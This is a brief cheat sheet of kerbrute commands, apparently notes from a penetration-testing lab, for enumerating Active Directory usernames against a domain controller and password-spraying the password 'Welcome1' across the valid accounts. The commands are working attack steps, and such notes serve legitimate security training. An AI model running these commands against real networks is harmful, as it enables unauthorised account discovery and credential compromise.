# It will enumerate available usernames
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
# This will password spray the pass "Welcome1" with the users.txt
# You can make a user txt file with enum4linux
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1